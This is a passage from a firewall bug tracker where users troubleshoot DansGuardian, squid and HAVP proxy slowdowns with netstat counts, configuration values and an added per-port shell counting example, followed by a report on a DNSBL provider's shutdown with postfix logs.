at the dashboard the HTTP Proxy status is off !!!
(0007863)
juankamilo   
2012-05-10 21:44   
Hi,

I have the same problem
do not know if this has to do but, i found these errors in /var/log/httpd/error_log

Use of uninitialized value in substitution (s///) at /home/httpd/html/proxy.pac line 287.
Use of uninitialized value in substitution (s///) at /home/httpd/html/proxy.pac line 163.
Use of uninitialized value in substitution (s///) at /home/httpd/html/proxy.pac line 160.
Use of uninitialized value in substitution (s///) at /home/httpd/html/proxy.pac line 163.
(0007865)
victorhugops   
2012-05-11 20:17   
Hello again,

the problem is recurrent !!! now, we need to restart dansguardian from time to time..

the last time, I see many TIME_WAIT connections in the port 3128 (squid), 8080(squid??) and 9998 (havp)


=====================================
# netstat -putan | egrep '(8080)' | wc -l
    667
# netstat -putan | egrep '(3128)' | wc -l
    213
# netstat -putan | egrep '(999)' | wc -l
   1331
# netstat -putan | grep TIME_WAIT | egrep '(8080)' | wc -l
    589
# netstat -putan | grep TIME_WAIT | egrep '(3128)' | wc -l
    103
# netstat -putan | grep TIME_WAIT | egrep '(999)' | wc -l
   1165
=====================================

the log files don't show anything...
all services "work" when checking in the OS

=====================================
# /etc/init.d/dansguardian status
Parent DansGuardian pid:3696
# /etc/init.d/squid status
squid (pid 7194 7192) is running...
# /etc/init.d/havp status
havp (pid 2666 2665 2664 2663 2662 2661 2660 2659 2658 2657 2656 2654 2653 2652 2651 2650 2649 2648 2647 2646 2645 2644 2643 2642 2641 2640 2639 2638 2637 2636 2635 2634 2633 2632 2631 2630 2629 2628 2627 2626 2624) is running...
# /etc/init.d/clamd status
clamd (pid 7180) is running...
=====================================

maybe the port where the proxy work (3128) is not a default ???
I believe that the problem is with antivir, but I can't find it (yet).

mmmm... that is bad !! :-(
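
The `egrep '(999)'` filters in the note above match the digits 999 anywhere on a line (ports 9998 and 9999, but also any ephemeral port or PID containing 999), so those totals mix several things together. The following added example, not part of the original note, counts TCP states for one exact port; the function names are assumptions and the sample rows are constructed in the `netstat -putan` column layout.

```shell
#!/bin/sh
# Added example: per-port TCP state counts from `netstat -tan` style output.
# Function names are assumptions; the sample rows below are constructed.

# count_states PORT: reads netstat output on stdin and prints "STATE COUNT"
# for TCP rows whose local or remote port is exactly PORT.
count_states() {
    awk -v port="$1" '
        $1 ~ /^tcp/ {
            # The port is the text after the last ":" (also true for IPv6).
            n = split($4, l, ":"); m = split($5, r, ":")
            if (l[n] == port || r[m] == port) seen[$6]++
        }
        END { for (s in seen) printf "%s %d\n", s, seen[s] }
    ' | sort
}

# state_count PORT STATE: a single number, 0 when the state is absent.
state_count() {
    count_states "$1" | awk -v s="$2" '$1 == s { n = $2 } END { print n + 0 }'
}

# Constructed sample: squid on 3128, havp on 9998, dansguardian on 9999,
# plus rows that only contain "999" by accident (39992, 49990, PID 1999).
sample_netstat() {
cat <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address      Foreign Address    State       PID/Program name
tcp        0      0 127.0.0.1:3128     0.0.0.0:*          LISTEN      7194/(squid)
tcp        0      0 127.0.0.1:9998     0.0.0.0:*          LISTEN      2624/havp
tcp        0      0 127.0.0.1:9999     0.0.0.0:*          LISTEN      3696/dansguardian
tcp        0      0 127.0.0.1:40112    127.0.0.1:9998     TIME_WAIT   -
tcp        0      0 127.0.0.1:40113    127.0.0.1:9998     TIME_WAIT   -
tcp        0      0 127.0.0.1:9998     127.0.0.1:40114    ESTABLISHED 2630/havp
tcp        0      0 127.0.0.1:9999     127.0.0.1:40120    TIME_WAIT   -
tcp        0      0 127.0.0.1:3128     127.0.0.1:39992    TIME_WAIT   -
tcp        0      0 192.0.2.1:22       192.0.2.50:49990   ESTABLISHED 1999/sshd
EOF
}

echo "exact match, port 9998:"
sample_netstat | count_states 9998
echo "TIME_WAIT on port 9998 (exact):      $(sample_netstat | state_count 9998 TIME_WAIT)"
echo "TIME_WAIT lines containing '999':    $(sample_netstat | grep TIME_WAIT | grep -c 999)"
```

On a live system, pipe `netstat -tan` into `count_states` with the port of interest instead of the sample.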
(0007871)
marioeirea   
2012-05-16 06:21   
Setting the following values in /etc/dansguardian/dansguardian.conf fixed it for me:

maxchildren = 400
minchildren = 32
minsparechildren = 15
preforkchildren = 8
maxsparechildren = 64
maxagechildren = 4000

Looks like these values were changed from 2.5 going forward, severely reduces the number of connections that can be open at the same time. Change it in the tmpl file if you want the values to stick.
(0007875)
victorhugops   
2012-05-26 18:08   
Hi,

that is interesting too
http://bugs.endian.com/view.php?id=3432

In my case, when the user visits a streaming site..
the havp takes a long time (and all threads) to process each one of those connections.

:-(
(0007923)
anand_apscan   
2012-06-20 07:32   
Hi,

I am using endian for the first time, I don't have much idea about endian,
someone please help me how to edit $MAXCHILDREN value in /etc/dansguardian/dansguardian.conf.tmpl file.

maxchildren = $MAXCHILDREN
minchildren = $MINCHILDREN
minsparechildren = $MINSPARECHILDREN
preforkchildren = $PREFORKCHILDREN
maxsparechildren = $MAXSPARECHILDREN
maxagechildren = $MAXAGECHILDREN
(0008022)
fqureshi   
2012-08-27 02:02   
@ anand_apscan

You can do the following:

nano /usr/lib/efw/dansguardian/default/settings
change the values as below:

MAXCHILDREN=500
MINCHILDREN=128
MINSPARECHILDREN=32
PREFORKCHILDREN=16
MAXSPARECHILDREN=256
MAXAGECHILDREN=10000


Also if you are facing slow browsing issue change the following values:

nano /var/efw/havp/settings

change 2 values as below

MAXSERVERS=150
SERVERNUMBER=50
(0008331)
ipanema211   
2012-11-22 20:43   
I have reason to believe it has something to do with havp

/var/efw/havp/settings does not exist on my 2.5.1 and creating it does not solve the problem. Changing the dansguardian settings to above didn't do the trick for me either.
Disabling anti virus on all content filter profiles solved the performance issue




View Issue Details
4500 [Endian Firewall] Proxy - STMP minor always 2012-11-15 13:46 2012-11-15 16:13
baldy  
 
normal  
new 2.5  
open  
none    
none  
   
DNSBL provider dsn.rfc-ignorant.org will be shutdown completely by November 30th
dsn.rfc-ignorant.org will be shutdown completely by the end of the month.
http://rfc-ignorant.org/endofanera.php

Currently a lot of mail is already blocked due to the RBL being unable to resolve the A records for the sending mailserver.

No workaround, to fix the RBL must be disabled and with a future update removed from the GUI altogether.
Nov 15 14:12:11 postfix/smtpd[13660]: NOQUEUE: reject: RCPT from smtp-vbr14.xs4all.nl[194.109.24.34]: 450 4.1.1 : Recipient address rejected: undeliverable address: host 192.168.1.1[192.168.1.1] said: 550 5.1.1 User unknown (in reply to RCPT TO command); from= to= proto=ESMTP helo=

Nov 15 14:12:11 postfix/smtpd[14347]: connect from smtp-vbr14.xs4all.nl[194.109.24.34]

Nov 15 14:12:11 postfix/smtpd[14347]: warning: smtp-vbr14.xs4all.nl.dsn.rfc-ignorant.org: RBL lookup error: Host or domain name not found. Name service error for name=smtp-vbr14.xs4all.nl.dsn.rfc-ignorant.org type=A: Host not